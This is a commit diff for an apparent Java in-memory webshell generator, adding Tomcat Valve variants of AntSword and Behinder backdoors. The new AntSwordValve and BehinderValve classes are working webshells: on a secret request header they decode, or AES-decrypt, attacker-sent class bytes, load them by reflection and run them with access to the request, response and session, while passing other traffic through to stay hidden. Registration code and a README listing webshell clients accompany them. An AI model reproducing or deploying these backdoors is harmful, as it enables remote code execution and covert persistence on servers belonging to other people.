add: 添加对 Tomcat Valve 的支持

pen4uin · Sep 14, 2024 · 146d04c · 146d04c
1 parent 1821089
commit 146d04c
Show file tree

Hide file tree

Showing 15 changed files with 711 additions and 43 deletions.
diff --git a/README.md b/README.md
@@ -26,7 +26,7 @@
 | Resin     | SpringWebFlux | [Behinder](https://github.com/rebeyond/Behinder) (4.0.7)         | Filter        | BCEL       | 表达式语句封装 |
 | WebLogic  |               | [Godzilla](https://github.com/BeichenDream/Godzilla) (4.0.1)     | Interceptor   | BIGINTEGER |         |
 | Jetty     |               | [Neo-reGeorg](https://github.com/L-codes/Neo-reGeorg) (5.1.0)    | HandlerMethod | CLASS      |         |
-| WebSphere |               | [Suo5](https://github.com/zema1/suo5) (0.9.0)                    |               | JAR        |         |
+| WebSphere |               | [Suo5](https://github.com/zema1/suo5) (0.9.0)                    | TomcatValve   | JAR        |         |
 | Undertow  |               | Custom                                                           |               | JAR_AGENT  |         |
 | GlassFish |               |                                                                  |               | JS         |         |
 |           |               |                                                                  |               | JSP        |         |

diff --git a/jmg-antsword/src/main/java/jmg/antsword/memshell/AntSwordValve.java b/jmg-antsword/src/main/java/jmg/antsword/memshell/AntSwordValve.java
@@ -0,0 +1,87 @@
+package jmg.antsword.memshell;
+
+import org.apache.catalina.Valve;
+import org.apache.catalina.connector.Request;
+import org.apache.catalina.connector.Response;
+
+import javax.servlet.ServletException;
+import java.io.IOException;
+import java.lang.reflect.Method;
+import java.net.URL;
+import java.net.URLClassLoader;
+
+
+public class AntSwordValve extends ClassLoader implements Valve {
+    protected Valve next;
+    protected boolean asyncSupported;
+
+    public String pass;
+
+    public String headerName;
+
+    public String headerValue;
+
+    public AntSwordValve() {
+    }
+
+    public AntSwordValve(ClassLoader c) {
+        super(c);
+    }
+
+    public Class g(byte[] b) {
+        return super.defineClass(b, 0, b.length);
+    }
+
+    @Override
+    public Valve getNext() {
+        return this.next;
+    }
+
+    @Override
+    public void setNext(Valve valve) {
+        this.next = valve;
+    }
+
+    @Override
+    public boolean isAsyncSupported() {
+        return this.asyncSupported;
+    }
+
+    @Override
+    public void backgroundProcess() {
+    }
+
+    @Override
+    public void invoke(Request request, Response response) throws IOException, ServletException {
+        try {
+            if (request.getHeader(headerName).contains(headerValue)) {
+                String cls = request.getParameter(pass);
+                if (cls != null) {
+
+                    byte[] data = base64Decode(cls);
+                    URLClassLoader classLoader = new URLClassLoader(new URL[0], Thread.currentThread().getContextClassLoader());
+                    Method method = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, Integer.TYPE, Integer.TYPE);
+                    method.setAccessible(true);
+                    Class clazz = (Class) method.invoke(classLoader, data, new Integer(0), new Integer(data.length));
+                    clazz.newInstance().equals(new Object[]{request, response});
+                }
+            }else {
+                // 重要: 没有这一步会将目标服务器打挂
+                this.getNext().invoke(request, response);
+            }
+        } catch (Exception e) {
+            this.getNext().invoke(request, response);
+        }
+    }
+
+    public byte[] base64Decode(String str) throws Exception {
+        try {
+            Class clazz = Class.forName("sun.misc.BASE64Decoder");
+            return (byte[]) ((byte[]) ((byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str)));
+        } catch (Exception var5) {
+            Class clazz = Class.forName("java.util.Base64");
+            Object decoder = clazz.getMethod("getDecoder").invoke((Object) null);
+            return (byte[]) ((byte[]) ((byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str)));
+        }
+    }
+}
diff --git a/jmg-antsword/src/main/java/jmg/antsword/util/ShellUtil.java b/jmg-antsword/src/main/java/jmg/antsword/util/ShellUtil.java
@@ -1,9 +1,6 @@
 package jmg.antsword.util;
 
-import jmg.antsword.memshell.AntSwordFilter;
-import jmg.antsword.memshell.AntSwordJakartaFilter;
-import jmg.antsword.memshell.AntSwordJakartaListener;
-import jmg.antsword.memshell.AntSwordListener;
+import jmg.antsword.memshell.*;
 import jmg.core.config.Constants;
 
 import java.util.HashMap;
@@ -35,11 +32,14 @@ public static String getShellClassName(String shellName) throws Exception {
         SHELL_CLASSNAME_MAP.put(AntSwordFilter.class.getSimpleName(), AntSwordFilter.class.getName());
         SHELL_CLASSNAME_MAP.put(AntSwordJakartaListener.class.getSimpleName(), AntSwordJakartaListener.class.getName());
         SHELL_CLASSNAME_MAP.put(AntSwordJakartaFilter.class.getSimpleName(), AntSwordJakartaFilter.class.getName());
+        SHELL_CLASSNAME_MAP.put(AntSwordValve.class.getSimpleName(), AntSwordValve.class.getName());
+
         Map<String, String> antSwordMap = new HashMap();
-        antSwordMap.put(Constants.SHELL_FILTER,AntSwordFilter.class.getSimpleName());
+        antSwordMap.put(Constants.SHELL_FILTER, AntSwordFilter.class.getSimpleName());
         antSwordMap.put(Constants.SHELL_LISTENER, AntSwordListener.class.getSimpleName());
-        antSwordMap.put(Constants.SHELL_JAKARTA_FILTER,AntSwordJakartaFilter.class.getSimpleName());
+        antSwordMap.put(Constants.SHELL_JAKARTA_FILTER, AntSwordJakartaFilter.class.getSimpleName());
         antSwordMap.put(Constants.SHELL_JAKARTA_LISTENER, AntSwordJakartaListener.class.getSimpleName());
+        antSwordMap.put(Constants.SHELL_VALVE, AntSwordValve.class.getSimpleName());
         toolMap.put(Constants.TOOL_ANTSWORD, antSwordMap);
     }
 

diff --git a/jmg-behinder/src/main/java/jmg/behinder/memshell/BehinderValve.java b/jmg-behinder/src/main/java/jmg/behinder/memshell/BehinderValve.java
@@ -0,0 +1,89 @@
+package jmg.behinder.memshell;
+
+import org.apache.catalina.Valve;
+import org.apache.catalina.connector.Request;
+import org.apache.catalina.connector.Response;
+
+import javax.crypto.Cipher;
+import javax.crypto.spec.SecretKeySpec;
+import javax.servlet.ServletException;
+import javax.servlet.http.HttpSession;
+import java.io.IOException;
+import java.util.HashMap;
+import java.util.Map;
+
+
+public class BehinderValve extends ClassLoader implements Valve {
+    protected Valve next;
+    protected boolean asyncSupported;
+
+    public String pass;
+
+    public String headerName;
+
+    public String headerValue;
+
+    public BehinderValve() {
+    }
+
+    public BehinderValve(ClassLoader c) {
+        super(c);
+    }
+
+    public Class g(byte[] b) {
+        return super.defineClass(b, 0, b.length);
+    }
+
+    @Override
+    public Valve getNext() {
+        return this.next;
+    }
+
+    @Override
+    public void setNext(Valve valve) {
+        this.next = valve;
+    }
+
+    @Override
+    public boolean isAsyncSupported() {
+        return this.asyncSupported;
+    }
+
+    @Override
+    public void backgroundProcess() {
+    }
+
+    @Override
+    public void invoke(Request request, Response response) throws IOException, ServletException {
+        try {
+            if (request.getHeader(headerName).contains(headerValue)) {
+                HttpSession session = (request.getSession());
+                Map obj = new HashMap();
+                obj.put("request", request);
+                obj.put("response", response);
+                obj.put("session", session);
+                session.putValue("u", pass);
+                Cipher c = Cipher.getInstance("AES");
+                c.init(2, new SecretKeySpec(pass.getBytes(), "AES"));
+                (new BehinderValve(this.getClass().getClassLoader())).g(c.doFinal(this.base64Decode(request.getReader().readLine()))).newInstance().equals(obj);
+            } else {
+                // 重要: 没有这一步会将目标服务器打挂
+                this.getNext().invoke(request, response);
+            }
+        } catch (Exception e) {
+            this.getNext().invoke(request, response);
+        }
+
+    }
+
+    public byte[] base64Decode(String str) throws Exception {
+        try {
+            Class clazz = Class.forName("sun.misc.BASE64Decoder");
+            return (byte[]) ((byte[]) ((byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str)));
+        } catch (Exception var5) {
+            Class clazz = Class.forName("java.util.Base64");
+            Object decoder = clazz.getMethod("getDecoder").invoke((Object) null);
+            return (byte[]) ((byte[]) ((byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str)));
+        }
+    }
+}
diff --git a/jmg-behinder/src/main/java/jmg/behinder/util/ShellUtil.java b/jmg-behinder/src/main/java/jmg/behinder/util/ShellUtil.java
@@ -33,13 +33,16 @@ public static String getShellClassName(String shellName) throws Exception {
         SHELL_CLASSNAME_MAP.put(BehinderInterceptor.class.getSimpleName(), BehinderInterceptor.class.getName());
         SHELL_CLASSNAME_MAP.put(BehinderJakartaFilter.class.getSimpleName(), BehinderJakartaFilter.class.getName());
         SHELL_CLASSNAME_MAP.put(BehinderJakartaListener.class.getSimpleName(), BehinderJakartaListener.class.getName());
+        SHELL_CLASSNAME_MAP.put(BehinderValve.class.getSimpleName(), BehinderValve.class.getName());
 
         Map<String, String> behinderMap = new HashMap();
         behinderMap.put(Constants.SHELL_FILTER, BehinderFilter.class.getSimpleName());
         behinderMap.put(Constants.SHELL_LISTENER, BehinderListener.class.getSimpleName());
         behinderMap.put(Constants.SHELL_INTERCEPTOR, BehinderInterceptor.class.getSimpleName());
         behinderMap.put(Constants.SHELL_JAKARTA_LISTENER, BehinderJakartaListener.class.getSimpleName());
         behinderMap.put(Constants.SHELL_JAKARTA_FILTER, BehinderJakartaFilter.class.getSimpleName());
+        behinderMap.put(Constants.SHELL_VALVE, BehinderValve.class.getSimpleName());
+
         toolMap.put(Constants.TOOL_BEHINDER, behinderMap);
 
     }

diff --git a/jmg-core/pom.xml b/jmg-core/pom.xml
@@ -26,5 +26,56 @@
             <artifactId>jakarta.servlet-api</artifactId>
             <version>5.0.0</version>
         </dependency>
+        <dependency>
+            <groupId>org.apache.tomcat</groupId>
+            <artifactId>tomcat-catalina</artifactId>
+            <version>8.5.58</version>
+            <exclusions>
+                <exclusion>
+                    <groupId>org.apache.tomcat</groupId>
+                    <artifactId>tomcat-api</artifactId>
+                </exclusion>
+                <exclusion>
+                    <groupId>org.apache.tomcat</groupId>
+                    <artifactId>tomcat-juli</artifactId>
+                </exclusion>
+                <exclusion>
+                    <groupId>org.apache.tomcat</groupId>
+                    <artifactId>tomcat-jni</artifactId>
+                </exclusion>
+                <exclusion>
+                    <groupId>org.apache.tomcat</groupId>
+                    <artifactId>tomcat-coyote</artifactId>
+                </exclusion>
+                <exclusion>
+                    <groupId>org.apache.tomcat</groupId>
+                    <artifactId>tomcat-util</artifactId>
+                </exclusion>
+                <exclusion>
+                    <groupId>org.apache.tomcat</groupId>
+                    <artifactId>tomcat-util-scan</artifactId>
+                </exclusion>
+                <exclusion>
+                    <groupId>org.apache.tomcat</groupId>
+                    <artifactId>tomcat-annotations-api</artifactId>
+                </exclusion>
+                <exclusion>
+                    <groupId>org.apache.tomcat</groupId>
+                    <artifactId>tomcat-el-api</artifactId>
+                </exclusion>
+                <exclusion>
+                    <groupId>org.apache.tomcat</groupId>
+                    <artifactId>tomcat-jsp-api</artifactId>
+                </exclusion>
+                <exclusion>
+                    <groupId>org.apache.tomcat</groupId>
+                    <artifactId>tomcat-servlet-api</artifactId>
+                </exclusion>
+                <exclusion>
+                    <groupId>org.apache.tomcat</groupId>
+                    <artifactId>tomcat-jaspic-api</artifactId>
+                </exclusion>
+            </exclusions>
+        </dependency>
     </dependencies>
 </project>
diff --git a/jmg-core/src/main/java/jmg/core/config/Constants.java b/jmg-core/src/main/java/jmg/core/config/Constants.java
@@ -2,7 +2,7 @@
 
 public class Constants {
 
-    public static final String JMG_VERSION = "1.0.8";
+    public static final String JMG_VERSION = "1.0.8_240914";
 
     public static final String JMG_NAME = "java-memshell-generator";
     public static final String JMG_DESCRIPTION = "Java 内存马生成器";